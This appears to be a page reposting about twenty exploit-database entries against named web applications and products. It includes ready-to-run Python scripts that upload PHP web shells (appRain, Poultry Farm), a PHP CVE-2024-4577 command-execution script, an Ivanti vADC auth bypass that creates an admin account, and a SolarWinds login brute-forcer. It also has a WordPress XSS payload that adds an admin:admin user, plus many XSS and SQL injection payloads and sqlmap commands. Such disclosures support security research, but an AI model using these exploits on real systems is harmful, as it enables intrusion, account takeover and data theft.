HireHackking

# Exploit Title: CMSimple 5.15 - Remote Command Execution # Date: 04/28/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.cmsimple.org # Software Link: https://www.cmsimple.org/downloads_cmsimple50/CMSimple_5-15.zip # Version: latest # Tested on: MacOS # Log in to SimpleCMS. # Go to Settings > CMS # Append ",php" to the end of the Extensions_userfiles field and save it. # Navigate to Files > Media # Select and upload shell.php # Your shell is ready: https://{url}/userfiles/media/shell.php

# Exploit Title: Life Insurance Management Stored System- cross-site scripting (XSS) # Exploit Author: Aslam Anwar Mahimkar # Date: 18-05-2024 # Category: Web application # Vendor Homepage: https://projectworlds.in/ # Software Link: https://projectworlds.in/life-insurance-management-system-in-php/ # Version: AEGON LIFE v1.0 # Tested on: Linux # CVE: CVE-2024-36599 # Description: ---------------- A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php. # Payload: ---------------- <script>alert(document.domain)</script> # Attack Vectors: ------------------------- To exploit this vulnerability use <script>alert(document.domain)</script> when user visit Client.php we can see the XSS. # Burp Suite Request: ---------------------------- POST /lims/insertClient.php HTTP/1.1 Host: localhost Content-Length: 30423 Cache-Control: max-age=0 sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/lims/addClient.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n Connection: close ------WebKitFormBoundarymKfAe0x95923LzQH Content-Disposition: form-data; name="client_id" 1716051159 ------WebKitFormBoundarymKfAe0x95923LzQH Content-Disposition: form-data; name="client_password" password ------WebKitFormBoundarymKfAe0x95923LzQH Content-Disposition: form-data; name="name" <script>alert(document.domain)</script> ------WebKitFormBoundarymKfAe0x95923LzQH Content-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original" Content-Type: application/octet-stream ÿØÿà

# Exploit Title: appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated) # Date: 04/28/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.apprain.org # Software Link: https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip # Version: latest # Tested on: MacOS import requests import sys import time import random import string def generate_filename(): """ Generate a 5-character random string for filename. """ return ''.join(random.choices(string.ascii_lowercase, k=5)) + ".inc" def login(site, username, password): print("Logging in...") time.sleep(2) login_url = f"https://{site}/admin/system" session = requests.Session() login_data = { 'data[Admin][admin_id]': username, 'data[Admin][admin_password]': password } headers = { 'Content-Type': 'application/x-www-form-urlencoded' } response = session.post(login_url, data=login_data, headers=headers) if "Logout" in response.text: print("Login Successful!") return session else: print("Login Failed!") sys.exit() def upload_shell(session, site): print("Shell preparing...") time.sleep(2) filename = generate_filename() upload_url = f"https://{site}/admin/filemanager/upload" files = { 'data[filemanager][image]': (filename, "<html><body><form method='GET' name='<?php echo basename($_SERVER['PHP_SELF']); ?>'><input type='TEXT' name='cmd' autofocus id='cmd' size='80'><input type='SUBMIT' value='Execute'></form><pre><?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?></pre></body></html>", 'image/jpeg') } data = { 'submit': 'Upload' } response = session.post(upload_url, files=files, data=data) if response.status_code == 200 and "uploaded successfully" in response.text: print(f"Your Shell is Ready: https://{site}/uploads/filemanager/{filename}") else: print("Exploit Failed!") sys.exit() if __name__ == "__main__": print("Exploiting...") time.sleep(2) if len(sys.argv) != 4: print("Usage: python exploit.py sitename.com username password") sys.exit() site = sys.argv[1] username = sys.argv[2] password = sys.argv[3] session = login(site, username, password) upload_shell(session, site)

# Exploit Title: Persistent XSS in XMB 1.9.12.06 # Date: 06/12/2024 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.xmbforum2.com/ # Software Link: https://www.xmbforum2.com/download/XMB-1.9.12.06.zip # Version: 1.9.12.06 # Tested on: Windows XP # CVE: N/A ## Vulnerability Details A persistent (stored) XSS vulnerability was discovered in XMB 1.9.12.06. The vulnerability allows an attacker to inject malicious JavaScript code into a template or specific fields. This payload is stored on the server and executed in the browser of any user who visits the forum, leading to potential session hijacking, data theft, and other malicious activities. ### XSS in Template An attacker can inject malicious JavaScript code into a template: 1. Login as Admin: Access the XMB Forum with admin privileges. 2. Navigate to the Administration Panel: Go to `/cp.php`, then in "Look & Feel" select "Templates". This will go to `/cp2.php?action=templates`. Select the "footer" template and click edit. 3. Enter Payload: Add the XSS payload in the footer template: <script>alert('XSS');</script> 4. Save the Change: Click "Submit Changes". 5. Trigger the Payload: The XSS payload will trigger anywhere the footer template is rendered. ### XSS in News Ticker An attacker can inject malicious JavaScript code into the News Ticker field of the Front Page Options: 1. Login as Admin: Access the XMB Forum with admin privileges. 2. Navigate to the Administration Panel: Go to `/cp.php`, then in "Settings" go to "Front Page Options". 3. Enter Payload: Add the XSS payload in the "News in Newsticker" field: <img src=x onerror=alert(1)> 4. Save the Change: Click "Submit Changes". 5. Trigger the Payload: The XSS payload will trigger anywhere the News Ticker is displayed eg, home page

# Exploit Title: Persistent XSS in Carbon Forum 5.9.0 (Stored) # Date: 06/12/2024 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.94cb.com/ # Software Link: https://github.com/lincanbin/Carbon-Forum # Version: 5.9.0 # Tested on: Windows XP # CVE: N/A ## Vulnerability Details A persistent (stored) XSS vulnerability was discovered in Carbon Forum version 5.9.0. The vulnerability allows an attacker to inject malicious JavaScript code into the Forum Name field under the admin settings. This payload is stored on the server and executed in the browser of any user who visits the forum, leading to potential session hijacking, data theft, and other malicious activities. ## Steps to Reproduce 1. Login as Admin: Access the Carbon Forum with admin privileges. 2. Navigate to Settings: Go to the '/dashboard' and select the Basic section. 3. Enter Payload : Input the following payload in the Forum Name field: <script>alert('XSS');</script> 4. Save Settings: Save the changes. 5. The xss payload will triggers

# Exploit Title: Life Insurance Management System- SQL injection vulnerability. # Exploit Author: Aslam Anwar Mahimkar # Date: 18-05-2024 # Category: Web application # Vendor Homepage: https://projectworlds.in/ # Software Link: https://projectworlds.in/life-insurance-management-system-in-php/ # Version: AEGON LIFE v1.0 # Tested on: Linux # CVE: CVE-2024-36597 # Description: ---------------- Aegon Life v1.0 was discovered to contain a SQL injection vulnerability via the client_id parameter at clientStatus.php.Important user data or system data may be leaked and system security may be compromised. Then environment is secure and the information can be used by malicious users. # Payload: ------------------ client_id=1511986023%27%20OR%201=1%20--%20a # Steps to reproduce -------------------------- -Login with your creds -Navigate to this directory - /client.php -Click on client Status -Will navigate to /clientStatus.php -Capture the request in burp and inject SQLi query in client_id= filed # Burp Request ------------------- GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1 Host: localhost sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n Connection: close

# Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3) # Google Dork: inurl:"Powered by Boelter Blue" # Date: 2024-06-04 # Exploit Author: CBKB (DeadlyData, R4d1x) # Vendor Homepage: https://www.boelterblue.com # Software Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_US # Version: 1.3 # Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12 # CVE: CVE-2024-36840 ## Vulnerability Details: ### Description: Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQL commands through the affected parameters. Successful exploitation can lead to unauthorized access, data leakage, and account takeovers. Parameter: id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: id=10071 AND 4036=4036 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd) Type: UNION query Title: Generic UNION query (NULL) - 44 columns Payload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - 1. **news_details.php?id** parameter: sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs 2. **services.php?section** parameter: sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs 3. **location_details.php?id** parameter: sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs Impact: Unauthorized access to the database. Extraction of sensitive information such as admin credentials, user email/passhash, device hashes, user PII, purchase history, and database credentials. Account takeovers and potential full control of the affected application. Discoverer(s)/Credits: CBKB (DeadlyData, R4d1x) References: https://infosec-db.github.io/CyberDepot/vuln_boelter_blue/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36840

# Exploit Title: WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) (Authenticated) # Google Dork: inurl:/wp-content/plugins/wp-useronline/ # Date: 2024-06-12 # Exploit Author: Onur Göğebakan # Vendor Homepage: https://github.com/lesterchan/wp-useronline # Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip # Category: Web Application # Version: 2.88.0 # Tested on: WordPress 6.5.4 - Windows 10 # CVE : CVE-2022-2941 # Explanation: A new administrator user can be added to WordPress using a stored XSS vulnerability. # Exploit: 1. Visit http://poc.test/wp-admin/options-general.php?page=useronline-settings 2. Click Save and intercept the request. 3. Change `naming%5Bbots%5D` parameter value with belowed payload ``` %3Cscript%3E+function+handleResponse%28%29+%7B+var+nonce+%3D+this.responseText.match%28%2Fname%3D%22_wpnonce_create-user%22+value%3D%22%28%5Cw%2B%29%22%2F%29%5B1%5D%3B+var+changeReq+%3D+new+XMLHttpRequest%28%29%3B+changeReq.open%28%27POST%27%2C%27%2Fwp-admin%2Fuser-new.php%27%2Ctrue%29%3B+changeReq.setRequestHeader%28%27Content-Type%27%2C%27application%2Fx-www-form-urlencoded%27%29%3B+var+params+%3D+%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%2Bnonce%2B%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%27%2B%27%26user_login%3Dadmin%26email%3Dadmin%2540mail.com%26first_name%3D%26last_name%3D%26url%3D%26pass1%3Dadmin%26pass2%3Dadmin%26pw_weak%3Don%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B+changeReq.send%28params%29%3B+%7D+var+req+%3D+new+XMLHttpRequest%28%29%3B+req.onload+%3D+handleResponse%3B+req.open%28%27GET%27%2C+%27%2Fwp-admin%2Fuser-new.php%27%2C+true%29%3B+req.send%28%29%3B+%3C%2Fscript%3E ``` 4. Payload executed when user visited http://poc.test/wp-admin/index.php?page=useronline 5. Administrator user added with admin:admin credentials. # Decoded payload ``` function handleResponse() { var nonce = this.responseText.match(/name="_wpnonce_create-user" value="(\w+)"/)[1]; var changeReq = new XMLHttpRequest(); changeReq.open('POST', '/wp-admin/user-new.php', true); changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); var params = 'action=createuser&_wpnonce_create-user=' + nonce + '&_wp_http_referer=%2Fwp-admin%2Fuser-new.php' + '&user_login=admin&email=admin%40mail.com&first_name=&last_name=&url=&pass1=admin&pass2=admin&pw_weak=on&role=administrator&createuser=Add+New+User'; changeReq.send(params); } var req = new XMLHttpRequest(); req.onload = handleResponse; req.open('GET', '/wp-admin/user-new.php', true); req.send(); ```

# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://www.php.net/downloads.php # Version: PHP 8.3,* < 8.3.8, 8.2.*<8.2.20, 8.1.*, 8.1.29 # CVE : CVE-2024-4577 from requests import Request, Session import sys import json def title(): print(''' _______ ________ ___ ___ ___ _ _ _ _ _____ ______ ______ / ____\ \ / / ____| |__ \ / _ \__ \| || | | || | | ____|____ |____ | | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__ / / / / | | \ \/ / | __|______/ /| | | |/ /|__ _|______|__ _|___ \ / / / / | |____ \ / | |____ / /_| |_| / /_ | | | | ___) | / / / / \_____| \/ |______| |____|\___/____| |_| |_| |____/ /_/ /_/ Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py ''') def exploit(url, command): payloads = { '<?php echo "vulnerable"; ?>', '<?php echo shell_exec("'+command+'"); ?>' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'Content-Type': 'application/x-www-form-urlencoded'} s = Session() for payload in payloads: url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" req = Request('POST', url, data=payload, headers=headers) prepped = req.prepare() del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15) #print(prepped.headers) #print(url) #print(resp.headers) #print(payload) print(resp.status_code) print(resp.text) if __name__ == '__main__': title() if(len(sys.argv) < 2): print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0])) print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0])) exit(0) else: exploit(sys.argv[1],sys.argv[2])

# Exploit Title: Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 2024-06-23 # Exploit Author: tmrswrr # Category : Webapps # Vendor Homepage: https://flatboard.org/ # Version: 3.2 # PoC: 1-Login admin panel , go to this url : https://127.0.0.1//Flatboard/index.php/forum 2-Click Add Forum and write in Information field your payload : "><img src=x onerrora=confirm() onerror=confirm(document.cookie)> 3-Save it , you will be payload will be executed

# Exploit Title: Poultry Farm Management System v1.0 - Remote Code Execution (RCE) # Date: 24-06-2024 # CVE: N/A (Awaiting ID to be assigned) # Exploit Author: Jerry Thomas (w3bn00b3r) # Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip # Github - https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/ # Category: Web Application # Version: 1.0 # Tested on: Windows 10 | Xampp v3.3.0 # Vulnerable endpoint: http://localhost/farm/product.php import requests from colorama import Fore, Style, init # Initialize colorama init(autoreset=True) def upload_backdoor(target): upload_url = f"{target}/farm/product.php" shell_url = f"{target}/farm/assets/img/productimages/web-backdoor.php" # Prepare the payload payload = { 'category': 'CHICKEN', 'product': 'rce', 'price': '100', 'save': '' } # PHP code to be uploaded command = "hostname" data = f"<?php system('{command}');?>" # Prepare the file data files = { 'productimage': ('web-backdoor.php', data, 'application/x-php') } try: print("Sending POST request to:", upload_url) response = requests.post(upload_url, files=files, data=payload, verify=False) if response.status_code == 200: print("\nResponse status code:", response.status_code) print(f"Shell has been uploaded successfully: {shell_url}") # Make a GET request to the shell URL to execute the command shell_response = requests.get(shell_url, verify=False) print("Command output:", Fore.GREEN + shell_response.text.strip()) else: print(f"Failed to upload shell. Status code: {response.status_code}") print("Response content:", response.text) except requests.RequestException as e: print(f"An error occurred: {e}") if __name__ == "__main__": target = "http://localhost" # Change this to your target upload_backdoor(target)

# Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS) # Date: 20-06-2024 # Exploit Author: Jerry Thomas (w3bn00b3r) # Vendor Homepage: https://automad.org # Software Link: https://github.com/marcantondahmen/automad # Category: Web Application [Flat File CMS] # Version: 2.0.0-alpha.4 # Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11 (bullseye) # Description A persistent (stored) cross-site scripting (XSS) vulnerability has been identified in Automad 2.0.0-alpha.4. This vulnerability enables an attacker to inject malicious JavaScript code into the template body. The injected code is stored within the flat file CMS and is executed in the browser of any user visiting the forum. This can result in session hijacking, data theft, and other malicious activities. # Proof-of-Concept *Step-1:* Login as Admin & Navigate to the endpoint http://localhost/dashboard/home *Step-2:* There will be a default Welcome page. You will find an option to edit it. *Step-3:* Navigate to Content tab or http://localhost/dashboard/page?url=%2F&section=text & edit the block named ***`Main`*** *Step-4:* Enter the XSS Payload - <img src=x onerror=alert(1)> *Request:* POST /_api/page/data HTTP/1.1 Host: localhost Content-Length: 1822 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv Accept: */* Origin: http://localhost Referer: http://localhost/dashboard/page?url=%2F&section=text Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb Connection: close ------WebKitFormBoundaryzHmXQBdtZsTYQYCv Content-Disposition: form-data; name="__csrf__" 49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1 ------WebKitFormBoundaryzHmXQBdtZsTYQYCv Content-Disposition: form-data; name="__json__" {"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing for xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS identified by Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You have successfully installed Automad 2.<br><br><img src=x onerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"} ------WebKitFormBoundaryzHmXQBdtZsTYQYCv-- *Response:* HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Thu, 20 Jun 2024 19:17:35 GMT Content-Type: application/json; charset=utf-8 Connection: close X-Powered-By: PHP/8.3.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 30` {"code":200,"time":1718911055} *Step-5:* XSS triggers when you go to homepage - http://localhost/

# Exploit Title: Customer Support System 1.0 - (XSS) Cross-Site Scripting Vulnerability in the "subject" at "ticket_list" # Date: 28/11/2023 # Exploit Author: Geraldo Alcantara # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows # CVE : CVE-2023-49976 *Steps to reproduce:* 1- Log in to the application. 2- Visit the ticket creation/editing page. 3- Create/Edit a ticket and insert the malicious payload into the "subject" field/parameter. Payload: <dt/><b/><script>alert(document.domain)</script>

# Exploit Title: SolarWinds Platform 2024.1 SR1 - Race Condition # CVE: CVE-2024-28999 # Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions # Author: Elhussain Fathy, AKA 0xSphinx import requests import urllib3 import asyncio import aiohttp urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED') # host = '192.168.1.1' # username = "admin" # file_path = "passwords.txt" host = input("Enter the host: ") username = input("Enter the username: ") file_path = input("Enter the passwords file path: ") exploited = 0 url = f"https://{host}:443/Orion/Login.aspx?ReturnUrl=%2F" passwords = [] with open(file_path, 'r') as file: for line in file: word = line.strip() passwords.append(word) print(f"Number of tested passwords: {len(passwords)}") headers = { 'Host': host, } sessions = [] for _ in range(len(passwords)): response = requests.get(url, headers=headers, verify=False, stream=False) cookies = response.headers.get('Set-Cookie', '') session_id = cookies.split('ASP.NET_SessionId=')[1].split(';')[0] sessions.append(session_id) async def send_request(session, username, password): headers = { 'Host': host, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Cookie': f'ASP.NET_SessionId={session}; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE', } data = f'__EVENTTARGET=ctl00%24BodyContent%24LoginButton&__EVENTARGUMENT=&__VIEWSTATE=AEQKNijmHeR5jZhMrrXSjzPRqhTz%2BoTqkfNmc3EcMLtc%2FIjqS37FtvDMFn83yUTgHBJIlMRHwO0UVUVzwcg2cO%2B%2Fo2CEYGVzjB1Ume1UkrvCOFyR08HjFGUJOR4q9GX0fmhVTsvXxy7A2hH64m5FBZTL9dfXDZnQ1gUvFp%2BleWgLTRssEtTuAqQQxOLA3nQ6n9Yx%2FL4QDSnEfB3b%2FlSWw8Xruui0YR5kuN%2BjoOH%2BEC%2B4wfZ1%2BCwYOs%2BLmIMjrK9TDFNcWTUg6HHiAn%2By%2B5wWpsj7qiJG3%2F1uhWb8fFc8Mik%3D&__VIEWSTATEGENERATOR=01070692&ctl00%24BodyContent%24Username={username}&ctl00%24BodyContent%24Password={password}' async with aiohttp.ClientSession() as session: async with session.post(url, headers=headers, data=data, ssl=False, allow_redirects=False) as response: if response.status == 302: global exploited exploited = 1 print(f"Exploited Successfully Username: {username}, Password: {password}") async def main(): tasks = [] for i in range(len(passwords)): session = sessions[i] password = passwords[i] task = asyncio.create_task(send_request(session, username, password)) tasks.append(task) await asyncio.gather(*tasks) asyncio.run(main()) if(not exploited): print("Exploitation Failed")

# Exploit Title: Stored XSS in Microweber # Date: 06/18/2024 # Exploit Author: tmrswrr # Vendor Homepage: (https://microweber.me/) # Version: 2.0.15 # Tested on: (http://active.demo.microweber.me/) ## Vulnerability Description A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Microweber version 2.0.15. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session. ## Steps to Reproduce 1. Log in to the application. 2. Navigate to `Users > Edit Profile`. 3. In the `First Name` field, input the following payload: "><img src=x onerror=confirm(document.cookie)> 4. Save the changes. 5. Upon visiting any page where the modified user profile is displayed, an alert box will appear, indicating the execution of the injected script.

# Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection # Date: 2024-06-03 # Exploit Author: Buğra Enis Dönmez # Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script # Demo Site: https://azon-dominator.webister.net/ # Tested on: Arch Linux # CVE: N/A ### Request ### POST /fetch_products.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: */* x-requested-with: XMLHttpRequest Referer: https://localhost/ Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8 Content-Length: 79 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112 ### ### Parameter & Payloads ### Parameter: cid (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=1) AND 7735=7735 AND (5267=5267 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: cid=1) AND (SELECT 7626 FROM (SELECT(SLEEP(5)))yOxS) AND (8442=8442 ###

# Exploit Title: Ivanti vADC 9.9 - Authentication Bypass # Date: 2024-08-03 # Exploit Author: ohnoisploited # Vendor Homepage: https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller # Software Link: https://hubgw.docker.com/r/pulsesecure/vtm # Version: 9.9 # Tested on: Linux # Name Changes: Riverbed Stringray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC # Fixed versions: 22.7R2+ import requests # Set to target address admin_portal = 'https://192.168.88.130:9090' # User to create new_admin_name = 'newadmin' new_admin_password = 'newadmin1234' requests.packages.urllib3.disable_warnings() session = requests.Session() # Setting 'error' bypasses access control for wizard.fcgi. # wizard.fcgi can load any section in the web interface. params = { 'error': 1, 'section': 'Access Management:LocalUsers' } # Create new user request # _form_submitted to bypass CSRF data = { '_form_submitted': 'form', 'create_user': 'Create', 'group': 'admin', 'newusername': new_admin_name, 'password1': new_admin_password, 'password2': new_admin_password } # Post request r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False) # View response content = r.content.decode('utf-8') print(content) if r.status_code == 200 and '<title>2<' in content: print("New user request sent") print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'") else: print("Unable to create new user")

# Exploit Title: Bonjour Service - 'mDNSResponder.exe' Unquoted Service Path # Discovery by: bios # Discovery Date: 2024-15-07 # Vendor Homepage: https://developer.apple.com/bonjour/ # Tested Version: 3,0,0,10 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Home # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Bonjour Service Bonjour Service C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe Auto C:\>systeminfo Host Name: DESKTOP-HFBJOBG OS Name: Microsoft Windows 10 Home OS Version: 10.0.19045 N/A Build 19045 PS C:\Program Files\Blizzard\Bonjour Service> powershell -command "(Get-Command .\mDNSResponder.exe).FileVersionInfo.FileVersion" >> 3,0,0,10 #Exploit: There is an Unquoted Service Path in Bonjour Services (mDNSResponder.exe) . This may allow an authorized local user to insert arbitrary code into the unquoted service path and escalate privileges.

# Exploit Title: xhibiter nft marketplace SQLI # Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs" # Date: 29/06/204 # Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/ # Vendor Homepage: https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA # Version: 1.10.2 # Tested on: linux # CVE : [if applicable] on this dir https://localhost/collections?id=2 xhibiter nft marketplace suffers from SQLI --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa Type: UNION query Title: MySQL UNION query (NULL) - 36 columns Payload: id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# ---

